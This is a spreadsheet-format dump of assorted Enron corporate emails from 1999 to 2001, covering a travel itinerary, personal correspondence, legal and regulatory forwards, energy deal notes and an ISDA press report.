    4:20 pm Depart Houston-Hobby_x000D_
   5:00 pm Arrive Austin - Bergstrom Int=01,l_x000D_
_x000D_
Dinner:   Meet Rick Causey in Driskill Lobby at 6:30 PM_x000D_
Cocktails: 7:00 =01) 7:30 PM_x000D_
    Dinner:  7:30 PM_x000D_
    The Josephine House at Jeffrey=01,s Restaurant_x000D_
    1601 Waterston_x000D_
    Austin, TX_x000D_
    Phone:  512-477-2177_x000D_
_x000D_
Hotel:   The Driskill_x000D_
    604 Brazos Street_x000D_
    Austin, TX 78701_x000D_
    Phone: 512-474-5911_x000D_
    Fax:  512-474-2214=20_x000D_
    Confirmation #:  94623459_x000D_
       =20_x000D_
Fri, Sept. 8  Southwest Flt WN 599_x000D_
    8:00 am Depart Austin - Bergstrom Int=01,l_x000D_
    8:45 am Arrive Houston - Hobby</t>
  </si>
  <si>
    <t>Mon, 4 Dec 2000 05:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: *Apology*</t>
  </si>
  <si>
    <t>?? Right now, you're 3 for 5 on forgetting and always the same response._x000D_
Doing better next time._x000D_
I'm sitting here wondering at the age of 35 what makes ME happy. Do I really_x000D_
know? What can I do to find out. What about those those things that do not_x000D_
make me happy? The only thing to say in with you in mind. Is. You've managed_x000D_
to be at both ends of the spectrum and not all by yourself. What I'm getting_x000D_
at is. . . The only time(s) I've experienced periods of pain (with one_x000D_
exception) with you is when you're involved with ANOTHER MAN. . . . . . . ._x000D_
PREOCCUPIED on your part. That was someone more important to you, and was_x000D_
that way for awhile. Now recent developments have occurred that's telling my_x000D_
heart that history my be repeating itself. I know what you've told me, but_x000D_
it seems all too familiar. Hey, this is me. Do what you want and who you_x000D_
want to. I know that sounds familiar. You said, that things at Work and Home_x000D_
have you mentally preoccupied. What's different from the first 2 times you_x000D_
remembered and then with the last 3 times you forgot? Coincidence?  We both_x000D_
know that Kevin will always be that Lazy/Self-Centered/Spoiled Brat of an_x000D_
A##Hole, until he wants to do something for HIMSELF. As for work. You got it_x000D_
good. I understand about that Childish-boy you call a Co-worker. And_x000D_
everything associated with that mess. I could very easily use that same_x000D_
excuse you did about forgetting anything. Have I ever forgotten you on_x000D_
anything, regardless of what was going? ? ? Well. . . I'm waiting. ? ? ?_x000D_
Sometimes I think I should be more of a Self-Centered/High Strung A##hole_x000D_
and look out for myself. Maybe I wouldn't feel the I do about a lot of_x000D_
things. But then again, Back to what's real. We're not Married, just_x000D_
friends. At least, when I was reminded of that last week. Do whom that makes_x000D_
you happy. You're a grown woman._x000D_
Well, I'll be here for you to tell me how wrong I am about everthing that_x000D_
I've said. And I want you to do it with both barrels._x000D_
_x000D_
P.S._x000D_
I thought Birthdays other than Valentines Day and X-mas was a day that you_x000D_
can show that special person how special they are to you. That must have_x000D_
something I read in a Far Side cartoon clip or fiction novel somewhere._x000D_
Maybe I'm asking for too much._x000D_
_x000D_
-----Original Message-----_x000D_
From: Dana.Davis@enron.com [mailto:Dana.Davis@enron.com]_x000D_
Sent: Monday, December 04, 2000 9:38 AM_x000D_
To: bjackson@msspc.com_x000D_
Subject: *Apology*_x000D_
_x000D_
_x000D_
I can't undo what didn't do or did but,  if you will allow me to apologize_x000D_
for being preoccupied and self-centered I will make it my business never to_x000D_
forget your birthday again.</t>
  </si>
  <si>
    <t>Thu, 19 Apr 2001 02:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jake.thomas@enron.com', 'stephen.thome@enron.com'})</t>
  </si>
  <si>
    <t>FW: Salmon Energy: Escrow Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Kay Mann/Corp/Enron on 04/19/2001 09:24 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
"O'BRIEN, Lisa" &lt;lisa.obrien@freshfields.com&gt; on 04/18/2001 03:40:34 PM_x000D_
To: "'ccampbell@kslaw.com'" &lt;ccampbell@kslaw.com&gt;, "'kay.mann@enron.com'" _x000D_
&lt;kay.mann@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: FW: Salmon Energy:  Escrow Agreement_x000D_
_x000D_
_x000D_
This e-mail is confidential and may well also be legally privileged. If you _x000D_
have received it in error, you are on notice of its status.  Please notify us _x000D_
immediately by reply e-mail and then delete this message from your system.  _x000D_
Please do not copy it or use it for any purposes, or disclose its contents to _x000D_
any other person:  to do so could be a breach of confidence.  Thank you for _x000D_
your co-operation.  Please contact our_x000D_
IT Helpdesk on +44 (0) 20 7936 4000 Ext.2000 or email ITHelp@freshfields.com _x000D_
if you need assistance._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
(Resending)_x000D_
Attached please find comments to the Escrow Agreement.  Please do not_x000D_
hesitate to call me or Gregg to discuss these comments._x000D_
_x000D_
_x000D_
 - Scanned_.pdf_x000D_
</t>
  </si>
  <si>
    <t>Tue, 3 Apr 2001 02:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/3/01; HourAhead hour: 9;  HourAhead schedule download failed. _x000D_
Manual intervention required.</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 14:25:58 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: 2001 Tennessee Football Schedule.html</t>
  </si>
  <si>
    <t>YEAH!  GO VOLS!!!_x000D_
Tennessee was great.  Trip did not last long enough.  Sorry you are faced_x000D_
with lay-offs around the holiday season.  I am a worrier too.  I think it_x000D_
will work out for you... let me know if I can do anything (remember I have_x000D_
friends in H.R. at Dynegy)._x000D_
_x000D_
I would like to invite Pierce, Stacey, and Donna (you met them on the ride_x000D_
and Suzanne knows them).  MAYBE Joe Gordon (he's a Tennessee fan too)._x000D_
That's it for me.  I'll bring my orange and white pom-poms and other_x000D_
Tennessee stuff plus beer and snacks... let me know how much/what you think_x000D_
we'll need!_x000D_
_x000D_
-----Original Message-----_x000D_
From: Kim.Ward@enron.com [mailto:Kim.Ward@enron.com]_x000D_
Sent: Monday, November 26, 2001 4:18 PM_x000D_
To: Hamby, Terri_x000D_
Subject: RE: 2001 Tennessee Football Schedule.html_x000D_
_x000D_
_x000D_
Terri,_x000D_
_x000D_
We are definitely watching the ballgame at suzanne's on saturday.  I am_x000D_
getting an email list together so if you have some people you want to add,_x000D_
just let me know.  How was Tennessee and your Thanksgiving?  Mine was just_x000D_
so, so.  Worrying about work and my friends (and self) getting laid off.  I_x000D_
do hope all is well with you - call me sometime this week -_x000D_
_x000D_
Kim_x000D_
_x000D_
 -----Original Message-----_x000D_
From:     "Hamby, Terri" &lt;Terri.Hamby@ElPaso.com&gt;@ENRON_x000D_
Sent:     Monday, November 19, 2001 4:47 PM_x000D_
To:       Ward, Kim S (Houston)_x000D_
Subject:  RE: 2001 Tennessee Football Schedule.html_x000D_
_x000D_
Kim!  Good to hear from you.  I could use that beer right now!  My weekend_x000D_
was busy (holiday shopping, etc.)  Did you do anything fun?  RE:  the_x000D_
party,_x000D_
I would have the party at my place, but I have a one bedroom apt. (not_x000D_
conducive to parties).  Tell Suzanne that it will all work out!  We need to_x000D_
get this thing planned, and soon!_x000D_
_x000D_
I am heading to Tennessee on Wednesday.  I hope it's cold there, I'm ready_x000D_
for some winter weather... Dallas sounds nice, I hope you have a great_x000D_
time._x000D_
Have a safe and happy Thanksgiving!!!!_x000D_
_x000D_
-----Original Message-----_x000D_
From: Kim.Ward@enron.com [mailto:Kim.Ward@enron.com]_x000D_
Sent: Monday, November 19, 2001 4:27 PM_x000D_
To: Hamby, Terri_x000D_
Subject: RE: 2001 Tennessee Football Schedule.html_x000D_
_x000D_
_x000D_
Terri,_x000D_
_x000D_
What's going on and how was your weekend?  We are still working on the_x000D_
TN/FLA party - Suzanne is worried about enough places for people to sit -_x000D_
but I say she shouldn't worry - just have a lot of beer!  Are you going to_x000D_
see PH over the holiday?  Don't know for sure what I am doing yet -_x000D_
thinking about going to Dallas - gotta work out the logistics though._x000D_
Let's get together for a beer soon -_x000D_
_x000D_
Kim_x000D_
_x000D_
 -----Original Message-----_x000D_
From:     "Hamby, Terri" &lt;Terri.Hamby@ElPaso.com&gt;@ENRON_x000D_
Sent:     Wednesday, November 14, 2001 11:39 AM_x000D_
To:       Ward, Kim S (Houston)_x000D_
Subject:  2001 Tennessee Football Schedule.html_x000D_
Importance:    High_x000D_
_x000D_
 &lt;&lt;2001 Tennessee Football Schedule.html&gt;&gt;_x000D_
_x000D_
_x000D_
******************************************************************_x000D_
This email and any files transmitted with it from the ElPaso_x000D_
Corporation are confidential and intended solely for the_x000D_
use of the individual or entity to whom they are addressed._x000D_
If you have received this email in error please notify the_x000D_
sender._x000D_
******************************************************************_x000D_
_x000D_
 - 2001 Tennessee Football Schedule.html &lt;&lt; File: 2001 Tennessee Football_x000D_
Schedule.html &gt;&gt;_x000D_
_x000D_
_x000D_
_x000D_
**********************************************************************_x000D_
This e-mail is the property of Enron Corp. and/or its relevant affiliate_x000D_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_x000D_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_x000D_
_x000D_
_x000D_
******************************************************************_x000D_
This email and any files transmitted with it from the ElPaso_x000D_
Corporation are confidential and intended solely for the_x000D_
use of the individual or entity to whom they are addressed._x000D_
If you have received this email in error please notify the_x000D_
sender._x000D_
******************************************************************_x000D_
_x000D_
_x000D_
******************************************************************_x000D_
This email and any files transmitted with it from the ElPaso_x000D_
Corporation are confidential and intended solely for the_x000D_
use of the individual or entity to whom they are addressed._x000D_
If you have received this email in error please notify the_x000D_
sender._x000D_
******************************************************************</t>
  </si>
  <si>
    <t>Thu, 30 Aug 2001 06:20:53 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rnuschler@akingump.com'})</t>
  </si>
  <si>
    <t>frozenset({'gina.taylor@enron.com', 'shelley.corman@enron.com', 'steven.harris@enron.com'})</t>
  </si>
  <si>
    <t>FW: Transwestern rebuttal testimony and separate answer filedtod_x000D_
 ay.</t>
  </si>
  <si>
    <t xml:space="preserve">Transwestern's pre-filed rebuttal testimony attached._x000D_
Direct Testimony, as well as hearing transcript, to follow shortly. _x000D_
 -- Robin Nuschler_x000D_
_x000D_
&gt; -----Original Message-----_x000D_
&gt; From:	Smith, Diane _x000D_
&gt; Sent:	Monday, August 27, 2001 4:18 PM_x000D_
&gt; To:	'jacob.leventhal@ferc.fed.us'; 'dlberesford@hhlaw.com'; 'kjlipson@hhlaw.com'; 'jpnevins@hhlaw.com'; 'pickettse@sce.com'; 'porterdk@sce.com'; 'gsmith@jhenergy.com'; 'kbedwards@gkrse-law.com'; 'jpfloom@gkrse-law.com'; 'imp@cpuc.ca.gov'; 'pmohler@hewm.com'; 'jxb7@pge.com'; 'frl3@pge.com'; 'dwa3@pge.com'; 'Koury@wrightlaw.com'; 'lisanne.crowley@troutmansanders.com'; 'thomas.burgess@ferc.fed.us'; 'michael.cotleur@ferc.fed.us'; 'gsterling@hhlaw.com'_x000D_
&gt; Cc:	'fkelly@gbmdc.com'; 'sstojic@gbmdc.com'; Moore, Charles A; 'dfossum@enron.com'; 'gporter@enron.com'; 'mpavlou@enron.com'_x000D_
&gt; Subject:	Transwestern rebuttal testimony and separate answer filed today._x000D_
&gt; _x000D_
&gt;  &lt;&lt;DC-#555241-1.DOC&gt;&gt;  &lt;&lt;DC-#555406-1.DOC&gt;&gt;  &lt;&lt;DC-#555403-1.DOC&gt;&gt;  &lt;&lt;DC-#555411-1.DOC&gt;&gt;  &lt;&lt;DC-#555408-1.DOC&gt;&gt;  &lt;&lt;DC-#555299-2.DOC&gt;&gt;  &lt;&lt;DC-#555262-1.DOC&gt;&gt;  &lt;&lt;DC-#555422-1.DOC&gt;&gt; _x000D_
_x000D_
The information contained in this e-mail message is intended only for the personal and confidential use of the recipient(s) named above. This message may be an attorney-client communication and/or work product and as such is privileged and confidential. If the reader of this message is not the intended recipient or an agent responsible for delivering it to the intended recipient, you are hereby notified that you have received this document in error and that any review, dissemination, distribution, or copying of this message is strictly prohibited. If you have received this communication in error, please notify us immediately by e-mail, and delete the original message. </t>
  </si>
  <si>
    <t>Thu, 9 Dec 1999 09:41:00 -0800 (PST)</t>
  </si>
  <si>
    <t>How about lunch?</t>
  </si>
  <si>
    <t xml:space="preserve">A typical utility luncheon._x000D_
---------------------- Forwarded by Steven J Kean/HOU/EES on 12/09/99 05:40 _x000D_
PM ---------------------------_x000D_
_x000D_
	Enron Energy Services_x000D_
	_x000D_
	From:  Michael Harris                           12/09/99 05:03 PM_x000D_
	Phone No: 713-345-7557_x000D_
	_x000D_
_x000D_
_x000D_
_x000D_
To: Steven J Kean/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: How about lunch?_x000D_
_x000D_
 - Lunch(1).jpg_x000D_
</t>
  </si>
  <si>
    <t>Mon, 9 Oct 2000 05:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: proposed cluster descriptors</t>
  </si>
  <si>
    <t xml:space="preserve">Davie -- _x000D_
_x000D_
Meets many, but may have some developmen needs works just fine.  _x000D_
_x000D_
I just don't want people to say someone is satisfactory and meets _x000D_
requirements when, in fact, there are developmental needs that are obvious _x000D_
when compared to persons in strong._x000D_
_x000D_
So, I am happy with your proposal (although I suggest that your second _x000D_
proposal does not meet the "fairly up" goal)._x000D_
_x000D_
Cheers.  Mich_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
David Oxley_x000D_
10/09/2000 12:34 PM_x000D_
To: Gina Corteselli/Corp/Enron@ENRON_x000D_
cc: Michelle Cash/HOU/ECT@ECT _x000D_
Subject: Re: proposed cluster descriptors  _x000D_
_x000D_
Mich,_x000D_
_x000D_
What's middle ground. I would prefer to keep satisfactory wording fairly up. _x000D_
This is what caused most concern at mid year in conjunction with our 20% _x000D_
guideline for that cluster "We don't feel comfortable putting Joe in here _x000D_
given what it says - he really does an OK job"._x000D_
_x000D_
My orginal pitch was meets many but may have some development needs relative _x000D_
to peers, or meets most or exceeds some and sucks in others._x000D_
_x000D_
The latter is my personnel favorite._x000D_
_x000D_
David_x000D_
_x000D_
_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  Gina Corteselli @ ENRON                           10/09/2000 11:49 AM_x000D_
	_x000D_
_x000D_
To: David Oxley/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: proposed cluster descriptors_x000D_
_x000D_
Do you agree?   _x000D_
---------------------- Forwarded by Gina Corteselli/Corp/Enron on 10/09/2000 _x000D_
11:43 AM ---------------------------_x000D_
_x000D_
_x000D_
Michelle Cash@ECT_x000D_
10/09/2000 11:31 AM_x000D_
To: Gina Corteselli/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: proposed cluster descriptors  _x000D_
_x000D_
Gina, I am not sure that the "Satisfactory" descriptor is accurate.  "Met" _x000D_
expectations probably does not fit the average person's view of a person in _x000D_
Satisfactory.  Perhaps "met most, but not all" or something like that would _x000D_
be more accurate._x000D_
_x000D_
Where are we on the total revamp?  Has that been postponed until next year?_x000D_
_x000D_
Thanks.  Michelle_x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Gina Corteselli @ ENRON                           10/09/2000 11:11 AM_x000D_
	_x000D_
_x000D_
To: Michelle Cash/HOU/ECT@ECT, David Oxley/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: proposed cluster descriptors_x000D_
_x000D_
Hi Michelle;_x000D_
_x000D_
I have attached the latest version of the proposed cluster descriptors for _x000D_
year end-2000.  We would like to have these reviewed by the VP/MD PRC _x000D_
Committee tomorrow , but wanted to ensure that you saw them first.  They _x000D_
comprise merely a refinement of the present descriptors, with an effort to _x000D_
demonstrating "relativity".  let me know your thoughts, thanks, G  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 20 Dec 2001 12:40:17 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Chrissy ... Are you</t>
  </si>
  <si>
    <t>Hey, I just saw your email.  I'm still here.  I'm moving my stuff from 6 to 5 today and then I'm going to take the longest vacation of my life.  I may or may not come in tomorrow but I will be out until Jan 2nd.  I'm probably leaving early today too.  I may actually take the first week of Jan off too.  _x000D_
_x000D_
How are you?  I just called your nubmer and got your voicemail.  I'm glad you have something.  Don't be upset if I don't return your email for awhile.  I'll be on vacation._x000D_
_x000D_
Later Gator_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Franklin, Cynthia" &lt;Cynthia.Franklin@ElPaso.com&gt;@ENRON  _x000D_
Sent:	Thursday, December 20, 2001 9:01 AM_x000D_
To:	Germany, Chris_x000D_
Subject:	Chrissy ... Are you_x000D_
Importance:	High_x000D_
_x000D_
.....still there?_x000D_
_x000D_
Cindy_x000D_
832.676.3177_x000D_
_x000D_
_x000D_
******************************************************************_x000D_
This email and any files transmitted with it from the ElPaso_x000D_
Corporation are confidential and intended solely for the_x000D_
use of the individual or entity to whom they are addressed._x000D_
If you have received this email in error please notify the_x000D_
sender._x000D_
******************************************************************</t>
  </si>
  <si>
    <t>Thu, 24 May 2001 10:08:24 -0700 (PDT)</t>
  </si>
  <si>
    <t>not fair_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Huble, Amanda  _x000D_
Sent:	Thursday, May 24, 2001 12:04 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
because I said so_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Thursday, May 24, 2001 12:04 PM_x000D_
To:	Huble, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
how_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Huble, Amanda  _x000D_
Sent:	Thursday, May 24, 2001 12:00 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
yes it is_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Thursday, May 24, 2001 12:00 PM_x000D_
To:	Huble, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
thats not a hint_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Huble, Amanda  _x000D_
Sent:	Thursday, May 24, 2001 11:59 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
you'll get it _x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Thursday, May 24, 2001 11:56 AM_x000D_
To:	Huble, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
how about a hint_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Huble, Amanda  _x000D_
Sent:	Thursday, May 24, 2001 11:45 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
You never know! _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Thursday, May 24, 2001 11:45 AM_x000D_
To:	Huble, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
as in hours days or weeks?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Huble, Amanda  _x000D_
Sent:	Thursday, May 24, 2001 11:34 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
very soon_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Thursday, May 24, 2001 11:33 AM_x000D_
To:	Huble, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
when do I get it_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Huble, Amanda  _x000D_
Sent:	Thursday, May 24, 2001 11:27 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
I have it_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Thursday, May 24, 2001 11:22 AM_x000D_
To:	Huble, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
by the way where is my present_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Huble, Amanda  _x000D_
Sent:	Thursday, May 24, 2001 11:07 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
I knew you would like that_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Thursday, May 24, 2001 11:07 AM_x000D_
To:	Huble, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
that was a good comeback_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Huble, Amanda  _x000D_
Sent:	Thursday, May 24, 2001 11:05 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
maybe I like trouble_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Thursday, May 24, 2001 11:05 AM_x000D_
To:	Huble, Amanda_x000D_
Subject:	_x000D_
_x000D_
you better be careful about drinks I think you might be in trouble</t>
  </si>
  <si>
    <t>Thu, 21 Sep 2000 07:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'liz.bellamy@enron.com', 'daren.farmer@enron.com', 'susan.hadix@enron.com'})</t>
  </si>
  <si>
    <t>Union Carbide - Seadrift HPL meter # 1332</t>
  </si>
  <si>
    <t>For Union Carbide for this month only, at Seadrift meter # 1332 only, all _x000D_
volumes will be under Sitara # 380578, instead of overflowing to swing ticket_x000D_
_x000D_
It's a Gas Daily priced deal_x000D_
_x000D_
Any questions - I'm at 3.5923 _x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Wed, 29 Aug 2001 14:24:39 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mike.swerzbin@enron.com', 'a..allen@enron.com', 'bill.williams@enron.com'})</t>
  </si>
  <si>
    <t>Lousiana Pacific Deal # 421598.1</t>
  </si>
  <si>
    <t xml:space="preserve">All-_x000D_
_x000D_
  Per an inquiry from Lousiana Pacific regarding deal # 421598.1 (LT NW):_x000D_
_x000D_
  Structure: 		7 MW around the clock, 100% load factor. Buy back at basis or remarket at a 70% / 30% split._x000D_
  _x000D_
  February 23, 2001:  	Load was taken from 7 MW to 4 MW for HE 11 - 24.  Deal # 421598.1 was reduced from a 7 MW to a 4 MW (D. Scholtes)._x000D_
			We remarketed the 3 MW's real time to WWP deal # 530654.1 (source PGE).  We did not enter a deal to keep LP whole.   _x000D_
  _x000D_
  February 24, 2001:  	Load was taken from 7 MW to 4 MW for HE 1 - 24.   Deal # 421598.1 was reduced from a 7 MW to a 4 MW (D. Scholtes)._x000D_
			We remarketed the 3 MW's real time to Puget for HE 1-9 deal # 530689.1 and to WWP for HE 10-24 deal # 530716.1._x000D_
			We did not enter a deal to keep LP whole.   _x000D_
  _x000D_
 August 29, 2001:  	Virginia set deal # 421598.1 back to 7 MW, keeping sale to LP whole, and entered deal # 754187.1 to buy back 3 MW of LP energy at 70 % of  the 			price sold real time. (70% / 30% split according to agreement with LP). _x000D_
			VT routed original purchase from PGE-deal 529161.1 (ST NW) back to Lousiana Pacific-deal # 421598.1 (LT NW) and routed the "buy-back" deal # 			754187.1 (ST W HOURLY) to WWP and to Puget (ST W HOURLY)._x000D_
_x000D_
  I think that this will properly take care of the dispute and make Lousiana Pacific happy.  Please let me know if you have any questions or comments._x000D_
_x000D_
_x000D_
  Thanks,_x000D_
_x000D_
  Virginia_x000D_
 </t>
  </si>
  <si>
    <t>Fri, 14 Jul 2000 11:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'brian.barto@enron.com', 'karl.silverling@ps.ge.com', 'stephen.swift@ps.ge.com', 'michael.barnas@ps.ge.com'})</t>
  </si>
  <si>
    <t>Electronic file of Coyote Springs contract</t>
  </si>
  <si>
    <t>Hi guys,_x000D_
_x000D_
Could someone send an electronic file of the execution copy of the Coyote _x000D_
Springs contract?_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Fri, 2 Mar 2001 03:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ksumme@isda.org', 'mcresta@cravath.com', 'markb@cibc.ca', 'rpickel@isda.org', 'shawn@blackbird.net', 'yoshitaka_akamatsu@btm.co.jp', 'shigeru_asai@sanwabank.co.jp', 'mcunningham@isda.org', 'yasumasa.nishi@ibjbank.co.jp', 'cirens@isda-eur.org', 'quentin_hills@hk.ml.com', 'francois@us.cibc.com', 'ernest.patrikis@aig.com', 'arothrock@pattonboggs.com', 'teruo.tanaka@ibjbank.co.jp', 'dmoorehead@pattonboggs.com', 'douglas.bongartz-renaud@nl.abnamro.com', 'brickell_mark@jpmorgan.com', 'dcunning@cravath.com', 'robert.mackay@nera.com', 'yhoribe@isda.org', 'dennis.oakley@chase.com', 'milphil@gateway.net', 'losullivan@isda.org', 'dpd@aurora.dti.ne.jp', 'twerlen@cravath.com', 'mengle_david@jpmorgan.com', 'esebton@isda-eur.org', 'tom.montag@gs.com', 'apapesch@isda.org', 'jhb1@bancosantander.es', 'chi-wing.yuen@aig.com', 'lmarshall@isda.org', 'mhitchcock@isda-eur.org', 'rmetcalfe@isda-eur.org', 'rainslie@isda.org', 'henning.bruttel@dresdner-bank.com', 'fwhx9396@mb.infoweb.ne.jp', 'kbailey2@exchange.ml.com', 'hiroyuki_keisho@sanwabank.co.jp', 'donna.matthews@ubsw.com', 'jcohn@cravath.com', 'kengelen@isda.org', 'tim.fredrickson@ubsw.com', 'goldenj@allenovery.com', 'damian.kissane@db.com', 'mark.wallace@wdr.com', 'kazuhiko_koshikawa@sanwabank.co.jp', 'mark.e.haedicke@enron.com', 'steve_targett@nag.national.com.au', 'rryan@isda.org', 'nlim@isda.org', 'skawano@isda.org', 'kdhulster@isda-eur.org', 'sebastien.cahen@socgen.com', 'evangelisti_joe@jpmorgan.com', 'maria.rosario@db.com', 'tmorita@isda.org', 'stevenkennedy@kennedyco.com', 'jonm@crt.com', 'scarey@isda.org', 'marjorie.b.marker@us.arthurandersen.com', 'h.ronald.weissman@us.arthurandersen.com', 'charlessmithson@mindspring.com', 'gilbert_adam@jpmorgan.com', 'jerry.delmissier@barclayscapital.com', 'maurits.schouten@csfb.com'})</t>
  </si>
  <si>
    <t>ISDA PRESS REPORT - MARCH 2, 2001</t>
  </si>
  <si>
    <t>ISDA PRESS REPORT - MARCH 2, 2001_x000D_
_x000D_
*  Fed Study Hints Credit Risks Correlation Should Tighten -_x000D_
Dow Jones_x000D_
* House Passes Bankruptcy Reform - BNA_x000D_
* What's A Default? - Derivatives Strategy_x000D_
* Derivatives Give Extra Nudge To Falling Nikkei - Reuters_x000D_
_x000D_
Fed Study Hints Credit Risks Correlation Should Tighten_x000D_
Dow Jones - March 2, 2001_x000D_
_x000D_
NEW YORK -(Dow Jones)- Banks should be prepared to tighten the coordination_x000D_
between credit risks they are exposed to in different markets, as they adapt_x000D_
to the changing requirements of the Basel Accord on capital requirements, a_x000D_
Federal Reserve study says._x000D_
_x000D_
Specifically, the report cites exposure to derivatives as one area where_x000D_
broader and more tightly integrated models of credit risk are likely to be a_x000D_
future requirement for banks._x000D_
_x000D_
"Especially in such cases," of "positions that involve derivatives," banks_x000D_
"credit risk models should reflect not only the uncertainty in future_x000D_
exposures, but also the potential correlation of exposures across credits,"_x000D_
the paper says._x000D_
_x000D_
The New York Federal Reserve study, entitled "Using Credit Risk Models For_x000D_
Regulatory Capital: Issues And Options," is for future publication in a_x000D_
forthcoming Economic Policy Review._x000D_
_x000D_
"The goal of this paper is to generate discussion and air alternative_x000D_
scenarios" among regulators and among banks as they adapt their credit risk_x000D_
models in future, said a co-author of the report, Beverly Hirtle, vice_x000D_
president at the New York Federal Reserve for banking studies, speaking with_x000D_
Dow Jones Newswires Wednesday._x000D_
_x000D_
Other co-authors were Mark Levonian, a director in the Banking Supervision_x000D_
and Regulation Division at the Federal Reserve Bank of San Francisco, Marc_x000D_
Saidenberg, a Bank Supervision officer and Stefan Walter, a vice president_x000D_
at the New York Fed and David Wright, an assistant director of the Banking_x000D_
Supervision and Regulation Division at the Board of Governors of the Federal_x000D_
Reserve System._x000D_
_x000D_
When questioned, Hirtle said the study's reference to derivatives and to the_x000D_
possible need for some banks to tighten correlations among different_x000D_
instruments of credit risk going forward wasn't based on specific events or_x000D_
problems in the financial sector._x000D_
_x000D_
Derivatives exposures were one factor that made a number of banks and_x000D_
companies vulnerable to financial shocks during the 1990s, including Barings_x000D_
Bank, German company Metallgesellschaft, Japan's Sumitomo Bank and the hedge_x000D_
fund Long Term Capital Management._x000D_
_x000D_
"For positions that involve derivatives or that otherwise depend to a_x000D_
material extent on market factors, standards likely would require integrated_x000D_
models of market movements and credit exposures," the report said._x000D_
_x000D_
Unlike exposures to loans, exposures to derivatives can change more rapidly,_x000D_
Hirtle said._x000D_
_x000D_
Correlating Different Loans Is Key_x000D_
_x000D_
Hirtle stressed the importance of banks correlating the levels of credit_x000D_
risk among loans to different borrowers._x000D_
_x000D_
When "a loan to a particular borrower has a rating in a bank's internal_x000D_
ratings system" and the bank then decides that loan is "is better or worse"_x000D_
than previously, then "if you looked across all of the loans in a bank's_x000D_
books, that tends to mean other credits are also being downgraded" or_x000D_
upgraded, Hirtle said._x000D_
_x000D_
"That correlation is a very important factor in the risks facing banks" and_x000D_
one which many banks are already aware of, Hirtle added._x000D_
_x000D_
She also gave an example in general terms of how a chain of events might_x000D_
lower the worth of a credit for a bank._x000D_
_x000D_
A firm might be downgraded by a credit ratings agency and they might draw_x000D_
down on a line of credit from a bank, so the bank's exposure goes up and the_x000D_
value of the loan goes down, Hirtle said. "That's an example of how three_x000D_
factors can move against a bank at the same time," she added._x000D_
_x000D_
Banks' adaptation of their internal controls to monitor risk will be partly_x000D_
driven by changes to an international agreement on the subject._x000D_
